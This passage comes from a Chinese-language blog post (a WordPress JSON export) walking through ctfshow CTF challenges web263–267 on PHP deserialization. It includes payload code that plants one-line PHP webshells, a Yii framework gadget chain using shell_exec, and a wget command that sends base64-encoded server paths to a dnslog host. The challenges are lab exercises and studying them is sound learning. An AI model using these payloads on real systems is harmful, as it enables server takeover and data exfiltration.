&nbsp;$this-&gt;msg = $m;<br> &nbsp; &nbsp; &nbsp; &nbsp;$this-&gt;to = $t;<br> &nbsp;  }<br>}<br>\u200b<br>if(isset($_COOKIE&#91;'msg'])){<br> &nbsp; &nbsp;$msg = unserialize(base64_decode($_COOKIE&#91;'msg']));<br> &nbsp; &nbsp;if($msg-&gt;token=='admin'){<br> &nbsp; &nbsp; &nbsp; &nbsp;echo $flag;<br> &nbsp;  }<br>}<\/code><\/pre>\n\n\n\n<blockquote 
class=\"wp-block-quote\"><p>if\u5224\u65ad\u91cc\u9700\u8981token==admin\uff0c\u800cclass\u7c7b\u91cctoken\u4e3auser\uff0c\u6240\u4ee5\u9700\u8981\u9003\u9038\u540e\u4fee\u6539<\/p><\/blockquote>\n\n\n\n<p>\u5173\u4e8e\u5b57\u7b26\u9003\u9038\u5728\u77e5\u8bc6\u70b9\u91cc\u6709\u8bb2\u600e\u4e48\u9003\u9038\uff0c\u8fd9\u91cc\u76f4\u63a5\u4e0apayload<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>&lt;?php<br>class message{<br> &nbsp; &nbsp;public $from;<br> &nbsp; &nbsp;public $msg;<br> &nbsp; &nbsp;public $to;<br> &nbsp; &nbsp;public $token='user';<br> &nbsp; &nbsp;public function __construct($f,$m,$t){<br> &nbsp; &nbsp; &nbsp; &nbsp;$this-&gt;from = $f;<br> &nbsp; &nbsp; &nbsp; &nbsp;$this-&gt;msg = $m;<br> &nbsp; &nbsp; &nbsp; &nbsp;$this-&gt;to = $t;<br> &nbsp;  }<br>}<br>function filter($msg){<br>    return str_replace('fuck', 'loveU', $msg);<br>}<br>\u200b<br>$msg = new message('fuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuck\";s:3:\"msg\";s:1:\"b\";s:2:\"to\";s:1:\"c\";s:5:\"token\";s:5:\"admin\";}','b','c');<br>\u200b<br>$msg_1 = base64_encode(filter(serialize($msg)));<br>\u200b<br>echo $msg_1;<br>\/\/\";s:3:\"msg\";s:1:\"b\";s:2:\"to\";s:1:\"c\";s:5:\"token\";s:5:\"admin\";} \u6539\u6210admin\u540e\u8fd9\u91cc\u670962\u4e2a\u5b57\u7b26\uff0c\u56e0\u6b64\u9700\u8981\u8f93\u516562\u4e2afuck\u8fdb\u884c\u9003\u9038<\/code><\/pre>\n\n\n\n<h2 class=\"wp-block-heading\">web263\u2014session<\/h2>\n\n\n\n<p>\u6e90\u7801\u6cc4\u9732\uff0c<code>\/www.zip<\/code>\u4e0b\u8f7d<\/p>\n\n\n\n<p><strong>index.php<\/strong><\/p>\n\n\n\n<figure class=\"wp-block-image\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/gitee.com\/hermitaria\/blogimagee\/raw\/master\/20210714011328.png'><img class=\"lazyload lazyload-style-1\" 
src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/gitee.com\/hermitaria\/blogimagee\/raw\/master\/20210714011328.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20210714011319973\"\/><\/div><\/figure>\n\n\n\n<p>\u5199\u5165cookie\uff0c\u540d\u4e3alimit<\/p>\n\n\n\n<p><strong>check.php<\/strong><\/p>\n\n\n\n<figure class=\"wp-block-image\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/gitee.com\/hermitaria\/blogimagee\/raw\/master\/20210714011601.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/gitee.com\/hermitaria\/blogimagee\/raw\/master\/20210714011601.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20210714011601613\"\/><\/div><\/figure>\n\n\n\n<p>\u8c03\u7528cookie<\/p>\n\n\n\n<p><strong>inc.php<\/strong><\/p>\n\n\n\n<figure class=\"wp-block-image\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/gitee.com\/hermitaria\/blogimagee\/raw\/master\/20210714011652.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" 
data-original=\"https:\/\/gitee.com\/hermitaria\/blogimagee\/raw\/master\/20210714011652.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20210714011652380\"\/><\/div><\/figure>\n\n\n\n<p>\u7c7bUser\u4e2d\uff0c\u6709<code>file_put_contents<\/code>\u51fd\u6570\uff0c\u53ef\u4ee5username\u4f5c\u4e3a\u6587\u4ef6\u540d\uff0cpassword\u4e3a\u4e00\u53e5\u8bdd\u6728\u9a6c<\/p>\n\n\n\n<p>\u5e76\u4e14\u5728inc.php\u4e2d\uff0c\u6709<code>ini_set('session.serialize_handler', 'php');<\/code>\uff0c\u8bf4\u660e\u8bfb\u53d6session\u5f15\u64ce\u4e3a\u9ed8\u8ba4php\u5f15\u64ce\uff0c\u53ef\u4ee5\u5229\u7528\u52a0<code>|<\/code>\u8fdb\u884c\u4f2a\u9020\u5e8f\u5217\u5316<\/p>\n\n\n\n<p>\u601d\u8def\u4e3a\uff0c\u6784\u9020\u4e00\u4e2a\u5e8f\u5217\u5316\u7684payload\uff0c\u4f2a\u9020\u4e3alimit\u7684cookie\uff0c\u8bbf\u95eeindex.php\u5199\u5165\uff0c\u518d\u8bbf\u95eecheck.php\u8fdb\u884c\u8c03\u7528\uff0c\u7136\u540e\u8bbf\u95eelog-\u5199\u5165\u7684\u6587\u4ef6\u540d\u5373\u53ef\u8c03\u7528\u5199\u5165\u7684\u4e00\u53e5\u8bdd\u6728\u9a6c<\/p>\n\n\n\n<p>payload<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>&lt;?php<br>class User{<br> &nbsp; &nbsp;public $username;<br> &nbsp; &nbsp;public $password;<br> &nbsp; &nbsp;public $status;<br> &nbsp; &nbsp;function __construct($username,$password){<br> &nbsp; &nbsp; &nbsp; &nbsp;$this-&gt;username = $username;<br> &nbsp; &nbsp; &nbsp; &nbsp;$this-&gt;password = $password;<br> &nbsp;  }<br> &nbsp; &nbsp;function setStatus($s){<br> &nbsp; &nbsp; &nbsp; &nbsp;$this-&gt;status=$s;<br> &nbsp;  }<br>}<br>\u200b<br>$User = new User('1.php','&lt;?php system(\"tac flag*\");?&gt;');<br>\u200b<br>echo base64_encode('|'.serialize($User));<\/code><\/pre>\n\n\n\n<h2 
class=\"wp-block-heading\">web264<\/h2>\n\n\n\n<p>\u5927\u81f4\u6e90\u7801\u8ddfweb262\u76f8\u540c\uff0c\u6709\u533a\u522b\u7684\u662f\u5728message.php\u4e2d\u7684\u8fd9\u6bb5\u4ee3\u7801<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>if(isset($_COOKIE&#91;'msg'])){<br> &nbsp; &nbsp;$msg = unserialize(base64_decode($_SESSION&#91;'msg']));<br> &nbsp; &nbsp;if($msg-&gt;token=='admin'){<br> &nbsp; &nbsp; &nbsp; &nbsp;echo $flag;<br> &nbsp;  }<br>}<\/code><\/pre>\n\n\n\n<p>\u7528\u7684\u662fsession\uff0c\u4e14\u9700\u8981\u5b58\u5728\u540d\u4e3amsg\u7684cookie<\/p>\n\n\n\n<p>\u6784\u9020payload\u7684\u65b9\u6cd5\u548c262\u76f8\u540c\uff0c\u7136\u540eurl\u4f20\u53c2<\/p>\n\n\n\n<p><code>f=a&amp;m=b&amp;t=fuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuck\";s:5:\"token\";s:5:\"admin\";}<\/code>\uff0c<\/p>\n\n\n\n<p>\u6700\u540e\u5728cookie\u4e0a\u6dfb\u52a0msg\uff0c\u503c\u968f\u4fbf\u4f20\uff0c\u518d\u8bbf\u95eemessage.php<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">web265\u2014\u6309\u5730\u5740\u4f20\u53c2<\/h2>\n\n\n\n<pre class=\"wp-block-code\"><code>&lt;?php<br>\u200b<br>error_reporting(0);<br>include('flag.php');<br>highlight_file(__FILE__);<br>class ctfshowAdmin{<br> &nbsp; &nbsp;public $token;<br> &nbsp; &nbsp;public $password;<br>\u200b<br> &nbsp; &nbsp;public function __construct($t,$p){<br> &nbsp; &nbsp; &nbsp; &nbsp;$this-&gt;token=$t;<br> &nbsp; &nbsp; &nbsp; &nbsp;$this-&gt;password = $p;<br> &nbsp;  }<br> &nbsp; &nbsp;public function login(){<br> &nbsp; &nbsp; &nbsp; &nbsp;return $this-&gt;token===$this-&gt;password;<br> &nbsp;  }<br>}<br>\u200b<br>$ctfshow = unserialize($_GET&#91;'ctfshow']);<br>$ctfshow-&gt;token=md5(mt_rand());<br>\u200b<br>if($ctfshow-&gt;login()){<br> &nbsp; &nbsp;echo $flag;<br>}<\/code><\/pre>\n\n\n\n<blockquote 
class=\"wp-block-quote\"><p>\u767b\u5f55\u9700\u8981token\u503c\u4e0epassword\u503c\u5168\u7b49\uff0c\u800ctoken\u503c\u662f\u4e00\u4e2a\u968f\u673a\u6570\u7684md5\uff0c\u662f\u4e0d\u53ef\u786e\u5b9a\u7684\u3002\u56e0\u6b64\u9700\u8981\u5c06password\u503c\u7684\u5730\u5740\u4f20\u5230token\u4e0a\u624d\u80fd\u4fdd\u8bc1\u503c\u76f8\u7b49<\/p><\/blockquote>\n\n\n\n<p>\u8003\u5bdf\u7684\u662fphp\u6309\u5730\u5740\u4f20\u53c2<code>&amp;<\/code>\uff0c\u9700\u8981\u5f15\u7528\u4e00\u4e2a\u4e2d\u95f4\u53d8\u91cf<\/p>\n\n\n\n<p>payload<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>&lt;?php<br>class ctfshowAdmin{<br> &nbsp; &nbsp;public $token;<br> &nbsp; &nbsp;public $password;<br>\u200b<br> &nbsp; &nbsp;public function __construct($t,$p){<br> &nbsp; &nbsp; &nbsp; &nbsp;$this-&gt;token=$t;<br> &nbsp; &nbsp; &nbsp; &nbsp;$this-&gt;password = &amp;$this-&gt;token;<br> &nbsp;  }<br> &nbsp; &nbsp;public function login(){<br> &nbsp; &nbsp; &nbsp; &nbsp;return $this-&gt;token===$this-&gt;password;<br> &nbsp;  }<br>}<br>$admin = new ctfshowAdmin('123','123');<br>echo serialize($admin);<\/code><\/pre>\n\n\n\n<h2 class=\"wp-block-heading\">web266\u2014\u5927\u5c0f\u5199<\/h2>\n\n\n\n<pre class=\"wp-block-code\"><code>&lt;?php<br>\u200b<br>highlight_file(__FILE__);<br>\u200b<br>include('flag.php');<br>$cs = file_get_contents('php:\/\/input');<br>\u200b<br>\u200b<br>class ctfshow{<br> &nbsp; &nbsp;public $username='xxxxxx';<br> &nbsp; &nbsp;public $password='xxxxxx';<br> &nbsp; &nbsp;public function __construct($u,$p){<br> &nbsp; &nbsp; &nbsp; &nbsp;$this-&gt;username=$u;<br> &nbsp; &nbsp; &nbsp; &nbsp;$this-&gt;password=$p;<br> &nbsp;  }<br> &nbsp; &nbsp;public function login(){<br> &nbsp; &nbsp; &nbsp; &nbsp;return $this-&gt;username===$this-&gt;password;<br> &nbsp;  }<br> &nbsp; &nbsp;public function __toString(){<br> &nbsp; &nbsp; &nbsp; &nbsp;return $this-&gt;username;<br> &nbsp;  }<br> &nbsp; &nbsp;public function __destruct(){<br> &nbsp; &nbsp; &nbsp; &nbsp;global $flag;<br> 
&nbsp; &nbsp; &nbsp; &nbsp;echo $flag;<br> &nbsp;  }<br>}<br>$ctfshowo=@unserialize($cs);<br>if(preg_match('\/ctfshow\/', $cs)){<br> &nbsp; &nbsp;throw new Exception(\"Error $ctfshowo\",1);<br>}<\/code><\/pre>\n\n\n\n<blockquote class=\"wp-block-quote\"><p>\u53ef\u4ee5\u770b\u5230__destruct\u65b9\u6cd5\u53ef\u4ee5\u8f93\u51faflag\uff0c\u4f46\u5728\u6b63\u5219\u5339\u914d\u4e2d\u542b\u6709ctfshow\u5c31\u629b\u51fa\u5f02\u5e38\uff0c\u5e8f\u5217\u5316\u540e\u542b\u6709ctfshow\uff0c\u56e0\u6b64\u9700\u8981\u7ed5\u8fc7<\/p><p>\u5176\u4e2d\u63a5\u6536\u5e8f\u5217\u5316\u6570\u636e\u7684\u662f$cs\uff0c\u800c$cs\u662f\u7528php:\/\/input\u8bfb\u53d6\u7684<\/p><\/blockquote>\n\n\n\n<p><strong>PHP\u5927\u5c0f\u5199\uff1a\u51fd\u6570\u540d\u548c\u7c7b\u540d\u4e0d\u533a\u5206\uff0c\u53d8\u91cf\u540d\u533a\u5206<\/strong><\/p>\n\n\n\n<p><strong>php:\/\/input\u662f\u4e00\u4e2a\u53ea\u8bfb\u4fe1\u606f\u6d41\uff0c\u7528\u4e8e\u8bf7\u6c42\u65b9\u5f0f\u662fpost\u7684\u60c5\u51b5\u3002\u4e00\u822c\u670d\u52a1\u7aef\u4f7f\u7528file_get_contents\u83b7\u53d6php:\/\/input\u5185\u5bb9<code>file_get_contents(php:\/\/input)<\/code><\/strong><\/p>\n\n\n\n<p>\u56e0\u6b64\u5728\u5e8f\u5217\u5316\u540e\u6539\u5176\u4e2dctfshow\u7684\u5b57\u6bcd\u4e3a\u5927\u5199\uff0c\u7528bp\u6293\u5305post\u4e0a\u53bb\u5373\u53ef<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>&lt;?php<br>class ctfshow{<br> &nbsp; &nbsp;public $username='xxxxxx';<br> &nbsp; &nbsp;public $password='xxxxxx';<br>}<br>$ctf = new ctfshow();<br>echo serialize($ctf);<\/code><\/pre>\n\n\n\n<h2 class=\"wp-block-heading\">web267\u2014yii\u53cd\u5e8f\u5217\u5316\u6f0f\u6d1e<\/h2>\n\n\n\n<p>\u5f31\u5bc6\u7801 admin admin\u767b\u5f55\u6210\u529f\u540e\uff0c\u5728about\u9875\u9762\u53d1\u73b0\u63d0\u793a?view-source \u8bbf\u95ee<code>url\/?r=site\/about&amp;view-source<\/code>\u5f97\u5230\u53cd\u5e8f\u5217\u5316\u70b9<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">\/\/\/backdoor\/shell<br>unserialize(base64_decode($_GET['code']))<\/pre>\n\n\n\n<p>payload 
<code>?r=backdoor\/shell&amp;code=poc<\/code><\/p>\n\n\n\n<p>\u5728poc\u4e2d\u5f97\u77e5\u5f53\u524d\u8def\u5f84\u6240\u5728\u7684\u6b65\u9aa4<\/p>\n\n\n\n<p>\u7528dnslog\uff1a<a href=\"http:\/\/dnslog.cn\/\">DNSLog Platform<\/a>\u751f\u6210SubDomain<\/p>\n\n\n\n<p>\u6784\u9020\u53c2\u6570\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">$this-&gt;id = \"wget `pwd|base64`.tmrolu.dnslog.cn\";<\/pre>\n\n\n\n<figure class=\"wp-block-image\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/gitee.com\/hermitaria\/blogimagee\/raw\/master\/20210714174208.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/gitee.com\/hermitaria\/blogimagee\/raw\/master\/20210714174208.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20210714174201304\"\/><\/div><\/figure>\n\n\n\n<p>\u7136\u540ebase64\u89e3\u5bc6\u5f97\u5230\u5f53\u524d\u8def\u5f84<\/p>\n\n\n\n<p>poc<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>&lt;?php<br>namespace yii\\rest{<br> &nbsp; &nbsp;class CreateAction{<br> &nbsp; &nbsp; &nbsp; &nbsp;public $checkAccess;<br> &nbsp; &nbsp; &nbsp; &nbsp;public $id;<br>\u200b<br> &nbsp; &nbsp; &nbsp; &nbsp;public function __construct(){<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;$this-&gt;checkAccess = 'shell_exec';<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;$this-&gt;id = \"echo '&lt;?php eval(\\$_POST&#91;1]);phpinfo();?&gt;' &gt; \/var\/www\/html\/basic\/web\/1.php\";<br> &nbsp; &nbsp; &nbsp;  }<br> &nbsp;  }<br>}<br>\u200b<br>namespace Faker{<br> &nbsp; &nbsp;use yii\\rest\\CreateAction;<br>\u200b<br> &nbsp; &nbsp;class Generator{<br> 
&nbsp; &nbsp; &nbsp; &nbsp;protected $formatters;<br>\u200b<br> &nbsp; &nbsp; &nbsp; &nbsp;public function __construct(){<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;$this-&gt;formatters&#91;'close'] = &#91;new CreateAction(), 'run'];<br> &nbsp; &nbsp; &nbsp;  }<br> &nbsp;  }<br>}<br>\u200b<br>namespace yii\\db{<br> &nbsp; &nbsp;use Faker\\Generator;<br>\u200b<br> &nbsp; &nbsp;class BatchQueryResult{<br> &nbsp; &nbsp; &nbsp; &nbsp;private $_dataReader;<br>\u200b<br> &nbsp; &nbsp; &nbsp; &nbsp;public function __construct(){<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;$this-&gt;_dataReader = new Generator;<br> &nbsp; &nbsp; &nbsp;  }<br> &nbsp;  }<br>}<br>namespace{<br> &nbsp; &nbsp;echo base64_encode(serialize(new yii\\db\\BatchQueryResult));<br>}<br>?&gt;<\/code><\/pre>\n","protected":false},"excerpt":{"rendered":"<p>\u77e5\u8bc6\u70b9\uff1aphp\u53cd\u5e8f\u5217\u5316 \u2013 \u9752\u5d50 web254 \u4ee3\u7801\u5ba1\u8ba1\uff0c\u9996\u5148\u521d\u59cb\u5316ctfShowUser\u7c7b\uff0c\u5728\u7b2c\u4e8c\u5c42if\u5f53\u4e2d 
[&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":[],"categories":[17],"tags":[18],"_links":{"self":[{"href":"http:\/\/101.34.19.194\/index.php?rest_route=\/wp\/v2\/posts\/227"}],"collection":[{"href":"http:\/\/101.34.19.194\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/101.34.19.194\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/101.34.19.194\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/101.34.19.194\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=227"}],"version-history":[{"count":2,"href":"http:\/\/101.34.19.194\/index.php?rest_route=\/wp\/v2\/posts\/227\/revisions"}],"predecessor-version":[{"id":232,"href":"http:\/\/101.34.19.194\/index.php?rest_route=\/wp\/v2\/posts\/227\/revisions\/232"}],"wp:attachment":[{"href":"http:\/\/101.34.19.194\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=227"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/101.34.19.194\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=227"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/101.34.19.194\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=227"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}